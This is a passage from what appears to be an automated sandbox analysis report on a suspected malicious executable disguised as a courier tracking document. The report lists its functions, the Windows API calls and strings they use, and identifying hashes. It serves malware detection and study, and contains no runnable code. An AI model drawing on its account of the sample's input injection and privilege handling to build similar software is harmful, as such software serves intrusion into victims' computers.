                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: LongNamePath_memmove
                                                    • String ID:
                                                    • API String ID: 2514874351-0
                                                    • Opcode ID: 38d92b8720ab08af85a6d307c478d23a8c42b08b09e627599339fda820c73b4a
                                                    • Instruction ID: 49050b2976fce859fc5af29c5b7151ced1f78994517aa3eac679234df5114a64
                                                    • Opcode Fuzzy Hash: 38d92b8720ab08af85a6d307c478d23a8c42b08b09e627599339fda820c73b4a
                                                    • Instruction Fuzzy Hash: CDE0863690512C5BC72096589C05FEA77DDDB897A0F0441B5FD0CD7204D9A1AD8086D0
                                                    Function 00F28E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock
                                                    • String ID:
                                                    • API String ID: 2638373210-0
                                                    • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                    • Instruction ID: 897095aef67a5c5b2fbec5d8e682bffe018dbb6fc17fe23d83a41badb9833bc9
                                                    • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                    • Instruction Fuzzy Hash: 53E092B1504B145BD7388A64D810BA373E1AB05314F00081DF2AA93241EF6278469759
                                                    Function 00EC5C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00EFDD42,?,?,00000000), ref: 00EC5C5F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 2fd711cb6716ac44f65f65aa708a9ebc63f8cbd719e83d33e16626d19e8c95a1
                                                    • Instruction ID: 4c4438ed6186f2edbca9ba77cfabd1ea4053da44a36c61f553e3e3ebec5f5a1b
                                                    • Opcode Fuzzy Hash: 2fd711cb6716ac44f65f65aa708a9ebc63f8cbd719e83d33e16626d19e8c95a1
                                                    • Instruction Fuzzy Hash: 02D0C77464020CBFE710DB80DC46FA9777CD745710F100194FD0456290D6B27D549795
                                                    Function 00EE525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __wfsopen
                                                    • String ID:
                                                    • API String ID: 197181222-0
                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction ID: ec4f32d6e399c870803152b731f38411a0a98911a5688f5f40fbf48e8355e835
                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction Fuzzy Hash: C9B0927644020C77CE012A82EC02A493B699B45768F408020FB0C2C172A673A6649A89
                                                    Function 00F01DE4 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00F01DF0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: PathTemp
                                                    • String ID:
                                                    • API String ID: 2920410445-0
                                                    • Opcode ID: c0f72a509fc40afb00c5b9a7dc9e25148fb99e6576ffc8bde7424937fc9975be
                                                    • Instruction ID: 1d520cfbaef433467f3c142b1277b77548bfc9ce1029cb505f659acd37e64519
                                                    • Opcode Fuzzy Hash: c0f72a509fc40afb00c5b9a7dc9e25148fb99e6576ffc8bde7424937fc9975be
                                                    • Instruction Fuzzy Hash: 62C04C7545001D9BD725A754CC95BA8727CBB11701F00409575459109095B01B88EE21
                                                    Function 00F2D07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(00000002,00000000), ref: 00F2D1FF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID:
                                                    • API String ID: 1452528299-0
                                                    • Opcode ID: b68ad69fa596961b9b6017f8d08ff1f8786df8f00437d8f0d900f6d429739537
                                                    • Instruction ID: e14c3532446dbf97b7834f0a6780bb8d09ec23a824c691a4c5a4e4b4cf8a082e
                                                    • Opcode Fuzzy Hash: b68ad69fa596961b9b6017f8d08ff1f8786df8f00437d8f0d900f6d429739537
                                                    • Instruction Fuzzy Hash: 74718E31608301CFD704EF24D591F6AB7E0AF89310F04596DF896AB3A2DB31E946DB52

                                                    Non-executed Functions

                                                    Function 00F4CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC2612: GetWindowLongW.USER32(?,000000EB), ref: 00EC2623
                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00F4CB37
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F4CB95
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F4CBD6
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F4CC00
                                                    • SendMessageW.USER32 ref: 00F4CC29
                                                    • _wcsncpy.LIBCMT ref: 00F4CC95
                                                    • GetKeyState.USER32(00000011), ref: 00F4CCB6
                                                    • GetKeyState.USER32(00000009), ref: 00F4CCC3
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F4CCD9
                                                    • GetKeyState.USER32(00000010), ref: 00F4CCE3
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F4CD0C
                                                    • SendMessageW.USER32 ref: 00F4CD33
                                                    • SendMessageW.USER32(?,00001030,?,00F4B348), ref: 00F4CE37
                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00F4CE4D
                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00F4CE60
                                                    • SetCapture.USER32(?), ref: 00F4CE69
                                                    • ClientToScreen.USER32(?,?), ref: 00F4CECE
                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00F4CEDB
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F4CEF5
                                                    • ReleaseCapture.USER32 ref: 00F4CF00
                                                    • GetCursorPos.USER32(?), ref: 00F4CF3A
                                                    • ScreenToClient.USER32(?,?), ref: 00F4CF47
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F4CFA3
                                                    • SendMessageW.USER32 ref: 00F4CFD1
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F4D00E
                                                    • SendMessageW.USER32 ref: 00F4D03D
                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F4D05E
                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F4D06D
                                                    • GetCursorPos.USER32(?), ref: 00F4D08D
                                                    • ScreenToClient.USER32(?,?), ref: 00F4D09A
                                                    • GetParent.USER32(?), ref: 00F4D0BA
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F4D123
                                                    • SendMessageW.USER32 ref: 00F4D154
                                                    • ClientToScreen.USER32(?,?), ref: 00F4D1B2
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F4D1E2
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F4D20C
                                                    • SendMessageW.USER32 ref: 00F4D22F
                                                    • ClientToScreen.USER32(?,?), ref: 00F4D281
                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F4D2B5
                                                      • Part of subcall function 00EC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00EC25EC
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F4D351
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                    • String ID: @GUI_DRAGID$F
                                                    • API String ID: 3977979337-4164748364
                                                    • Opcode ID: 3fb02778e89c2e40bdbe634f021269e403853f6b52d74122daf5c114532a6a04
                                                    • Instruction ID: 874e4fb3b88cf87fbcf6dd84c82667be462f894178afdca9dfb8a72b6276c8e6
                                                    • Opcode Fuzzy Hash: 3fb02778e89c2e40bdbe634f021269e403853f6b52d74122daf5c114532a6a04
                                                    • Instruction Fuzzy Hash: AF429B38605245AFD724CF24CC88FAABFE5FF89720F141519FA59972A1C731D844EB92
                                                    Function 00F47DDB Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00F484D0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: %d/%02d/%02d
                                                    • API String ID: 3850602802-328681919
                                                    • Opcode ID: 0de123a49ee6f22adec653df45c60d8b95741fe11da88da2c876e747078b77e1
                                                    • Instruction ID: f23d88e4b0159691935ae2b3a4ecc0adbe1a171493e80aae35f9694df49f4906
                                                    • Opcode Fuzzy Hash: 0de123a49ee6f22adec653df45c60d8b95741fe11da88da2c876e747078b77e1
                                                    • Instruction Fuzzy Hash: 9412C371900249ABEB259F24CC49FAF7FE4EF45360F104129FD1AEA2E1DB709946EB50
                                                    Function 00ED6F9E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5018COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_memset
                                                    • String ID: 3c$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_
                                                    • API String ID: 1357608183-3681475764
                                                    • Opcode ID: ffceb2887481c6a558fee7036dcc498c80ffb4285ac9c58c1faac6efdbf50b64
                                                    • Instruction ID: 0cbfb60d2c741a7cb7c98c131b5ebad2be2c520e2aa385211363557b5912a9c6
                                                    • Opcode Fuzzy Hash: ffceb2887481c6a558fee7036dcc498c80ffb4285ac9c58c1faac6efdbf50b64
                                                    • Instruction Fuzzy Hash: AF938075E042199BDB24CF98C881BEDB7B1FF48324F25816AE955AB381E7709DC2DB40
                                                    Function 00EC48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32(00000000,?), ref: 00EC48DF
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EFD665
                                                    • IsIconic.USER32(?), ref: 00EFD66E
                                                    • ShowWindow.USER32(?,00000009), ref: 00EFD67B
                                                    • SetForegroundWindow.USER32(?), ref: 00EFD685
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EFD69B
                                                    • GetCurrentThreadId.KERNEL32 ref: 00EFD6A2
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EFD6AE
                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00EFD6BF
                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00EFD6C7
                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00EFD6CF
                                                    • SetForegroundWindow.USER32(?), ref: 00EFD6D2
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EFD6E7
                                                    • keybd_event.USER32(00000012,00000000), ref: 00EFD6F2
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EFD6FC
                                                    • keybd_event.USER32(00000012,00000000), ref: 00EFD701
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EFD70A
                                                    • keybd_event.USER32(00000012,00000000), ref: 00EFD70F
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EFD719
                                                    • keybd_event.USER32(00000012,00000000), ref: 00EFD71E
                                                    • SetForegroundWindow.USER32(?), ref: 00EFD721
                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 00EFD748
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 4125248594-2988720461
                                                    • Opcode ID: d4a8986cfb34d488e80fc0640d1be7a2c85b5885f0443d744165f11b2ce200fe
                                                    • Instruction ID: 1011561eae0fa0938c69b3f9d68a97cf75bd3cb510497c00ecd65d25b9ee8b45
                                                    • Opcode Fuzzy Hash: d4a8986cfb34d488e80fc0640d1be7a2c85b5885f0443d744165f11b2ce200fe
                                                    • Instruction Fuzzy Hash: 4F31B275A4031CBBEB202BA18C49F7F3E6DEB55B50F114026FE08FA1D0CAB05810BAA0
                                                    Function 00F18310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00F187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F1882B
                                                      • Part of subcall function 00F187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F18858
                                                      • Part of subcall function 00F187E1: GetLastError.KERNEL32 ref: 00F18865
                                                    • _memset.LIBCMT ref: 00F18353
                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00F183A5
                                                    • CloseHandle.KERNEL32(?), ref: 00F183B6
                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F183CD
                                                    • GetProcessWindowStation.USER32 ref: 00F183E6
                                                    • SetProcessWindowStation.USER32(00000000), ref: 00F183F0
                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F1840A
                                                      • Part of subcall function 00F181CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F18309), ref: 00F181E0
                                                      • Part of subcall function 00F181CB: CloseHandle.KERNEL32(?,?,00F18309), ref: 00F181F2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                    • String ID: $default$winsta0
                                                    • API String ID: 2063423040-1027155976
                                                    • Opcode ID: 098d5aac744df8c7673cf6ce3da99f8e67b5ae075e13879abe885299338434a7
                                                    • Instruction ID: c2494021853422e3e63fb4c9b4501509a1ddc61ab57f3086b7b8097f6280a736
                                                    • Opcode Fuzzy Hash: 098d5aac744df8c7673cf6ce3da99f8e67b5ae075e13879abe885299338434a7
                                                    • Instruction Fuzzy Hash: 03818A71C0020DAFDF119FA4CD45AEE7BB9EF053A4F184069FD14A2161EB358E96EB20
                                                    Function 00F2C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F2C78D
                                                    • FindClose.KERNEL32(00000000), ref: 00F2C7E1
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F2C806
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F2C81D
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F2C844
                                                    • __swprintf.LIBCMT ref: 00F2C890
                                                    • __swprintf.LIBCMT ref: 00F2C8D3
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                    • __swprintf.LIBCMT ref: 00F2C927
                                                      • Part of subcall function 00EE3698: __woutput_l.LIBCMT ref: 00EE36F1
                                                    • __swprintf.LIBCMT ref: 00F2C975
                                                      • Part of subcall function 00EE3698: __flsbuf.LIBCMT ref: 00EE3713
                                                      • Part of subcall function 00EE3698: __flsbuf.LIBCMT ref: 00EE372B
                                                    • __swprintf.LIBCMT ref: 00F2C9C4
                                                    • __swprintf.LIBCMT ref: 00F2CA13
                                                    • __swprintf.LIBCMT ref: 00F2CA62
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                    • API String ID: 3953360268-2428617273
                                                    • Opcode ID: 73c7f5cd87d433fec01ce5e0e0fd6330ba340bf2ef9c48e135437d82b42c9008
                                                    • Instruction ID: 5883bae4ff13051b84b5ffb7cc067ba1eeb58e51ec89825ecee51322264e733c
                                                    • Opcode Fuzzy Hash: 73c7f5cd87d433fec01ce5e0e0fd6330ba340bf2ef9c48e135437d82b42c9008
                                                    • Instruction Fuzzy Hash: 18A16EB2404344ABC704EFA4D989EAFB7ECFF94700F40191DF59597192EA35EA09CB62
                                                    Function 00F2EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00F2EFB6
                                                    • _wcscmp.LIBCMT ref: 00F2EFCB
                                                    • _wcscmp.LIBCMT ref: 00F2EFE2
                                                    • GetFileAttributesW.KERNEL32(?), ref: 00F2EFF4
                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00F2F00E
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00F2F026
                                                    • FindClose.KERNEL32(00000000), ref: 00F2F031
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00F2F04D
                                                    • _wcscmp.LIBCMT ref: 00F2F074
                                                    • _wcscmp.LIBCMT ref: 00F2F08B
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F2F09D
                                                    • SetCurrentDirectoryW.KERNEL32(00F78920), ref: 00F2F0BB
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F2F0C5
                                                    • FindClose.KERNEL32(00000000), ref: 00F2F0D2
                                                    • FindClose.KERNEL32(00000000), ref: 00F2F0E4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                    • String ID: *.*
                                                    • API String ID: 1803514871-438819550
                                                    • Opcode ID: ec7fab876ed973e25b391adfd6efc4e6929ba66d960e40cfb0b26cd3153c394f
                                                    • Instruction ID: 0e9c876e02314dcd3886123a9329c8f7dfbe481bf447f9ef9b0c1e9f677332e8
                                                    • Opcode Fuzzy Hash: ec7fab876ed973e25b391adfd6efc4e6929ba66d960e40cfb0b26cd3153c394f
                                                    • Instruction Fuzzy Hash: 5631D53690122D6BDB14DFB4EC48AEE77BCDF49360F104176E909E3191DB70DA48EA61
                                                    Function 00F40857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                    Download Yara Rule
                                                    APIs
